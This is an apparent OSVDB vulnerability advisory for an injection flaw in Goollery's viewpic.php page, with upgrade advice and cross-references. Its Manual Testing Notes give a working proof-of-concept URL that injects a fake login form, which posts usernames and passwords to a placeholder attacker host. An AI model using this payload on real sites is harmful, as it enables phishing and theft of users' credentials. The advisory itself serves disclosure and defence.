Goollery viewpic.php Arbitrary Command Execution

2004-10-31T23:58:53
ID: OSVDB:11319
Type: osvdb
Reporter: Lostmon Lords (Lostmon@gmail.com)
Modified: 2004-10-31T23:58:53

Description

Vulnerability Description

Goollery contains a flaw that may allow an attacker to remotely execute arbitrary code. The issue is due to improper validation of user input passed to the viewpic.php page variable. It is possible that the flaw may allow the attacker to execute arbitrary HTML or script code in the victim's browser in the security context of the affected site, resulting in a loss of integrity.

Solution Description

Upgrade to version 0.04b or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

Manual Testing Notes

http://[victim]/goollery/viewpic.php?id=2&conversation_id=ffee00b71f3931a&btopage=<form%20action="http://[attacker]/save2db.asp"%20method="post">Username:<input%20name="username"%20type="text"%20maxlength="30"><br>Password:<input%20name="password"%20type="text"%20maxlength="30"><br><input%20name="login"%20type="submit"%20value="Login"></form>

References:

Vendor URL: http://www.wirzm.ch/goollery/about/about.php
Security Tracker: 1012062
Secunia Advisory ID: 11320
Related OSVDB ID: 11318
Other Advisory URL: http://www.osvdb.org/ref/11/11xxx-goollery_multiple.txt
ISS X-Force ID: 17957
CVE-2004-2245
Bugtraq ID: 11587